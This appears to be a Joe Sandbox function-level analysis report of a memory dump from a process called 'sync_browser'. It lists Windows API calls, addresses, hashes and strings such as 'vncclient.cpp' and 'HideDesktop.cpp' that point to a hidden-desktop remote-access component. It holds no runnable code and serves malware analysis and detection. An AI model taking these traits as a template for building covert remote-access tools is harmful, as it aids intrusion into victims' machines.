Instruction ID: 1d747c2e7bfedf4a8e70a967068ffdb83453ee2e77ac3c7491d08f3e43febdfd
Opcode Fuzzy Hash: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
Instruction Fuzzy Hash: 04217E3AF28A9242E720DB65F44432AA760BF99790F144135FA9D83B59DE7CD449C701

Function 00007FF67E8837C4 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E8837CE
FlsGetValue.KERNEL32(?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E8837DC
SetLastError.KERNEL32(?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E883834

Part of subcall function 00007FF67E8832EC: Sleep.KERNEL32(?,?,?,00007FF67E8837F7,?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19), ref: 00007FF67E883331

FlsSetValue.KERNEL32(?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E883808
free.LIBCMT ref: 00007FF67E88382B

Part of subcall function 00007FF67E88370C: _lock.LIBCMT ref: 00007FF67E883760
Part of subcall function 00007FF67E88370C: _lock.LIBCMT ref: 00007FF67E88377F

GetCurrentThreadId.KERNEL32 ref: 00007FF67E88381C

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
Instruction ID: 0167d0ae6f07beaba3a49b5569d4c0ae0c75446cd5582df54611cb8d817b5d9e
Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
Instruction Fuzzy Hash: 4A017126E2974386FA05AF69E444038A295AF68790F084234ED1E873D1EF3CE44DC610

Function 00007FF67E7DDEB0 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF67E7DDECD
free.LIBCMT ref: 00007FF67E7DDED7

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

DeleteObject.GDI32 ref: 00007FF67E7DDEE0
free.LIBCMT ref: 00007FF67E7DDEEA
DeleteObject.GDI32 ref: 00007FF67E7DDEF3
free.LIBCMT ref: 00007FF67E7DDEFD

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: d1e3790ca69d27bde17f614978f7e119cb29ace29c054124991cbde3621388be
Instruction ID: 1edd40bb184054df1b3b83796a582406922f4d142a09dc719288d3976daa8982
Opcode Fuzzy Hash: d1e3790ca69d27bde17f614978f7e119cb29ace29c054124991cbde3621388be
Instruction Fuzzy Hash: 31011233B69A4196DA44DB56E990178B334FF98B90B444031EA5D877A1CF3DE879C300

Function 00007FF67E7D0390 Relevance: 9.0, APIs: 6, Instructions: 22COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF67E7D03A7
free.LIBCMT ref: 00007FF67E7D03B1

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

DeleteObject.GDI32 ref: 00007FF67E7D03BA
free.LIBCMT ref: 00007FF67E7D03C4
DeleteObject.GDI32 ref: 00007FF67E7D03CD
free.LIBCMT ref: 00007FF67E7D03D7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
Instruction ID: 067a2f3c9c5081f633343f9362482fe90c7505b05ff7ed3e52d74936536d533f
Opcode Fuzzy Hash: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
Instruction Fuzzy Hash: 7BF0D463A65A4185EB40EF65D851068B338FFA8F94B404031EA5D873A5CF3DD89AC300

Function 00007FF67E7DDD20 Relevance: 9.0, APIs: 6, Instructions: 22COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF67E7DDD37
free.LIBCMT ref: 00007FF67E7DDD41

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

DeleteObject.GDI32 ref: 00007FF67E7DDD4A
free.LIBCMT ref: 00007FF67E7DDD54
DeleteObject.GDI32 ref: 00007FF67E7DDD5D
free.LIBCMT ref: 00007FF67E7DDD67

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
Instruction ID: 067a2f3c9c5081f633343f9362482fe90c7505b05ff7ed3e52d74936536d533f
Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
Instruction Fuzzy Hash: 7BF0D463A65A4185EB40EF65D851068B338FFA8F94B404031EA5D873A5CF3DD89AC300

Function 00007FF67E7EB810 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 255fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7EB866
ReadFile.KERNEL32 ref: 00007FF67E7EB8B8
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7EBB99
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7EBBB1

Strings

vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF67E7EBA26

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterFileRead
String ID: vncclient.cpp : Compress returned error in File Send :%d
API String ID: 3826087893-1161645139
Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
Instruction ID: f7ea6d059380bbf84f0d572e1d374a779b86764191e55f2d1735c69261252e71
Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
Instruction Fuzzy Hash: 7BB18F33A28A4289E7648F25C8403FD3BA1EB54B58F140236EE5D9B6D9CE3CE459C754

Function 00007FF67E817530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E817574
GetProcAddress.KERNEL32 ref: 00007FF67E817591
FreeLibrary.KERNEL32 ref: 00007FF67E817619

Strings

EnumDisplayDevicesA, xrefs: 00007FF67E817587
USER32, xrefs: 00007FF67E81756D

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
Instruction ID: 1dff644a9d4b241edd53ff01a15d20023988e3c4b1ca4eeba7242597ff4d8ad9
Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
Instruction Fuzzy Hash: 3631C733B28B4285EA60DF95E4446A9E2A4FBA6790F540139EEAD83794DF3DD809C700

Function 00007FF67E817410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E817455
GetProcAddress.KERNEL32 ref: 00007FF67E817472
FreeLibrary.KERNEL32 ref: 00007FF67E8174F9

Strings

EnumDisplayDevicesA, xrefs: 00007FF67E817468
USER32, xrefs: 00007FF67E81744E

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
Instruction ID: ed6f3bf171095db405e6d0f17b0d15a6389b117c7ea57d6876c8546c5f3c4b7c
Opcode Fuzzy Hash: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
Instruction Fuzzy Hash: 9531EC33B28B8145E760CF55E5446A5B7A0FBAAB94F540238EEAD83794DF3DD909C700

Function 00007FF67E7C6BA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7C6BDE
RegQueryValueExA.ADVAPI32 ref: 00007FF67E7C6C1C
RegCloseKey.ADVAPI32 ref: 00007FF67E7C6C9C

Strings

CSDVersion, xrefs: 00007FF67E7C6C05
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF67E7C6BC0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$Software\Microsoft\Windows NT\CurrentVersion
API String ID: 3677997916-605553437
Opcode ID: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
Instruction ID: 6acfeb823dbc7c1b2f7b0bf04598bb9b49af2ba718f67ac10b8e6847eb2a22b7
Opcode Fuzzy Hash: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
Instruction Fuzzy Hash: EB31BB23B2968285EB708B54F48077AB7A8FB65754F405332F69E879E4DF2DE458C700

Function 00007FF67E8171D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E817212
GetProcAddress.KERNEL32 ref: 00007FF67E81722F
FreeLibrary.KERNEL32 ref: 00007FF67E81729D

Strings

EnumDisplayDevicesA, xrefs: 00007FF67E817225
USER32, xrefs: 00007FF67E81720B

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
Instruction ID: bbb42484326ad306a161069593e5d5484ed02ac0f53bee96b2b5148258d4c928
Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
Instruction Fuzzy Hash: 8C21A533B28B4146E760DF55E4446A9A3A4FBA9790F550239EEAE83784DF3DD80A8700

Function 00007FF67E7C67E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7C6851
RegQueryValueExA.ADVAPI32 ref: 00007FF67E7C6889
RegCloseKey.ADVAPI32 ref: 00007FF67E7C68BB

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF67E7C6838
SubVersionNumber, xrefs: 00007FF67E7C6865

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
API String ID: 3677997916-1834015684
Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
Instruction ID: d3d6752903a170d5ccb83e847635991d7101c983cb578e25acec093d4cd1448a
Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
Instruction Fuzzy Hash: CD213762A28B8281FB608B14E444766B3A8FFA4758F445235FA4D476A8EF3CD089C704

Function 00007FF67E7CA600 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E7CA661

Part of subcall function 00007FF67E7CA200: GetProcAddress.KERNEL32 ref: 00007FF67E7CA225
Part of subcall function 00007FF67E7CA200: FreeLibrary.KERNEL32 ref: 00007FF67E7CA265

Part of subcall function 00007FF67E7CA290: CoInitialize.OLE32 ref: 00007FF67E7CA2B8
Part of subcall function 00007FF67E7CA290: CoCreateInstance.OLE32 ref: 00007FF67E7CA2E5

SystemParametersInfoA.USER32 ref: 00007FF67E7CA694

Strings

HideDesktop.cpp : Restorewallpaper %i, xrefs: 00007FF67E7CA60B
shell32.dll, xrefs: 00007FF67E7CA65A
HideDesktop.cpp : Restorewallpaper %i %i, xrefs: 00007FF67E7CA635

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
API String ID: 3848869850-2975526927
Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
Instruction ID: 7120c6e407c30ba9eb58d1673f2e118124b65a869e0ad9e9356b2d48e7187928
Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
Instruction Fuzzy Hash: FA112A67F3954381FA509B24E8146B56369AFB4309F404532F41EE66B6DE3CA60DC741

Function 00007FF67E7CD790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00007FF67E7CD7BA
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7CD7D6
WritePrivateProfileSectionA.KERNEL32 ref: 00007FF67E7CD804

Strings

isWritable, xrefs: 00007FF67E7CD7C5
Permissions, xrefs: 00007FF67E7CD7CC, 00007FF67E7CD7FA

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
